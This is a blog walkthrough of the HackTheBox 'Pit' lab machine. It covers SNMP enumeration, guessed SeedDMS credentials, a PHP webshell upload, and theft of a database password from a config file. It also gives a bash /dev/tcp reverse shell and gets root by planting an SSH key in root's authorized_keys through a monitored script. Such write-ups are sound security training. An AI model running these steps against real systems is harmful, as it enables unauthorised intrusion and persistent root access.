In this post, i would like to share walkthrough on Pit Machine.

This room is been considered difficulty rated as MEDIUM machine

Information Gathering

Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Nmap scan report for 10.129.107.44
Host is up (0.63s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9090-TCP:V=7.91%T=SSL%I=7%D=5/15%Time=60A075FA%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,E70,"HTTP/1\.1\x20400\x20Bad\x20request\r\nContent-Type:
SF:\x20text/html;\x20charset=utf8\r\nTransfer-Encoding:\x20chunked\r\nX-DN
SF:S-Prefetch-Control:\x20off\r\nReferrer-Policy:\x20no-referrer\r\nX-Cont
SF:ent-Type-Options:\x20nosniff\r\nCross-Origin-Resource-Policy:\x20same-o
SF:rigin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<head>\n\x20\x20\x20\x20
SF:<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title>\n\x20\x20\x20\x20<met
SF:a\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charset=utf
SF:-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width=de
SF:vice-width,\x20initial-scale=1\.0\">\n\x20\x20\x20\x20<style>\n\tbody\x
SF:20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20margin:\x200;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-family:\x20\"RedHatDi
SF:splay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20Arial,\x20sans-serif;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-size:\x2012px;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20line-height:\x201\.6666666
SF:7;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20color:\x20#333333;\
SF:n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x20#
SF:f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20\x2
SF:0\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20border:\
SF:x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20vertical-align:\
SF:x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-w
SF:eight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20mar
SF:gin:\x200\x200\x2010p")%r(HTTPOptions,E70,"HTTP/1\.1\x20400\x20Bad\x20r
SF:equest\r\nContent-Type:\x20text/html;\x20charset=utf8\r\nTransfer-Encod
SF:ing:\x20chunked\r\nX-DNS-Prefetch-Control:\x20off\r\nReferrer-Policy:\x
SF:20no-referrer\r\nX-Content-Type-Options:\x20nosniff\r\nCross-Origin-Res
SF:ource-Policy:\x20same-origin\r\n\r\n29\r\n<!DOCTYPE\x20html>\n<html>\n<
SF:head>\n\x20\x20\x20\x20<title>\r\nb\r\nBad\x20request\r\nd08\r\n</title
SF:>\n\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"te
SF:xt/html;\x20charset=utf-8\">\n\x20\x20\x20\x20<meta\x20name=\"viewport\
SF:"\x20content=\"width=device-width,\x20initial-scale=1\.0\">\n\x20\x20\x
SF:20\x20<style>\n\tbody\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20fon
SF:t-family:\x20\"RedHatDisplay\",\x20\"Open\x20Sans\",\x20Helvetica,\x20A
SF:rial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20f
SF:ont-size:\x2012px;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20lin
SF:e-height:\x201\.66666667;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20color:\x20#333333;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0background-color:\x20#f5f5f5;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20img\x20{\n\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20border:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20vertical-align:\x20middle;\n\x20\x20\x20\x20\x20\x20\x20\x20}\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20h1\x20{\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20font-weight:\x20300;\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20p\x20{\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20margin:\x200\x200\x2010p");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 15 21:34:03 2021 -- 1 IP address (1 host up) scanned in 293.76 seconds

We managed to see one subdomain on the machine which is dms.pit.htb

We need to whitelist the domain name for the machine such as pit.htb and dms.pit.htb

Let’s open the browser and straight into the website interface.

We found there’s a Red Hat Enterprise Linux nginx default page that shown just like above.

When we try to access the pit.htb with a different port such as 9090 and we are able to see CentOS Linux login page. We need to find the credentials which it will allow us to login to the CentOS Dashboard.

Gaining Access

Let’s enemurate more on snmp with the tools snmpwalk which it might give some information that we can make use for our next step.

* How we managed to know 161 port which used for snmp is open?
We need to scan the port using nmap command such as nmap -sC -sV -sU -p- <IP Address> -Pn

The command that we should be using here such as snmpwalk -v1/v2c -c public pit.htb 1.3.6.1.4.1

From the snmpwalk output, we managed to gather information such as username=michelle and string “/var/www/htm/seeddms51x/seeddms”

I’m asssuming that seeddms51x/seeddms is the directory for the subdomain dms-pit.htb

We are been re-direct to SeedDMS login page when we enter those url http://dms-pit.htb/seeddms51x/seeddms

Let’s enter the credentials on the user ID and password field where i presume that username and password would be the same (michelle)

We managed to login to the dashboard and we should be looking on how to upload some sort file that we can make use later.

We can click on the Docs > Users > Michelle and there’s no file been save over there.

I have try to upload the php-reverse shell on the local file and we cannot retrieve any connection back to us.

After doing some research, we can try to upload a simple PHP backdoor that been located at /usr/share/webshell/php directory if you are using Kali Linux

We can verify that the backdoor by using seeddms51x/data/1048576/<ID>/1.php?cmd=<any command> parameter

After a while, the simple php backdoor have been removed from the system. As a result, we need to re-upload the backdoor so that we can proceed with the backdoor command again.

We should be able to notice that the current directory is /var/www/html/seeddms51x/data/1048576/30 when we execute the PWD command. While enumerating the directory on the browser, we found there’s a conf directory which locates at /var/www/html/seeddms51x/conf

We can read the file settings.xml by changing ls into cat command. The file output has been rendered by the browser. We can read the code properly by viewing the source code.

Oh wow! We managed to found the password under the dbPass configuration

Maintaining Access

Let’s try to login pit.htb:9090 with the credentials

Bang! We have successfully login to the CentOS Linux Dashboard. On the left side of website, We notice that there’s a Terminal Menu

I found the user flag by executing “cat user.txt

Escalate to Root Privileges Access

Let’s get a proper shell on our machine by running bash -i >& /dev/tcp/<IP Address>/<Port> 0>&1

We managed to get shell on our machine’s terminal by start nc -lvnp 9007 before executing bash command on the CentOS Linux Dashboard

I have run ps aux and linpeas.sh on the machine to get some information that we can use to get root privileges access

After reading my previous output, I notice that there’s one line that looks weird to me such as

iso.3.6.1.4.1.8072.1.3.2.2.1.2.10.109.111.110.105.116.111.114.105.110.103 = STRING: "/usr/bin/monitor"

We can see the line that shown such as screenshot above.

Let’s access the /usr/bin/ directory to run monitor.sh file but we got permission denied

Let’s read what’s written on the monitor file by executing cat /usr/bin/monitor. By looking at the file, any file that start with check and end with sh on the monitoring will be transfer to monitor (I guess!)

Let’s access the /usr/local/monitoring directory and see what’s stored there. Sadly, there’s a permission denied

We need to create our own ssh id_rsa on the Kali Linux machine and copy everythin on id_rsa.pub

We can edit the file on /usr/local/monitoring by using vi /usr/local/monitoring/check_darknite.sh

Those that need to add to check_darknite.sh will be something such as

#!/bin/bash
echo '<paste from id_rsa.pub>' > /root/.ssh/authorized_keys"

We need to insert the code above on the .sh file

We need to update the snmp by using the same command that we use earlier phrase (snmpwalk -v1/v2c -c public pit.hub 1.3.6.1.4.1)

Let’s access the machine via ssh command such as ssh -i id_rsa root@pit.htb

  • We need to give permission to id_rsa by execute the command chmod 600 id_rsa

We can read the root by execute “cat root.txt

-THE END-

Happy Learning Guys!

Extra Information: We can go to /etc/shadow to unlock the write-up

One thought on “HackTheBox: Pit Machine Walkthrough – Medium Difficulty”

Leave a Reply

Your email address will not be published. Required fields are marked *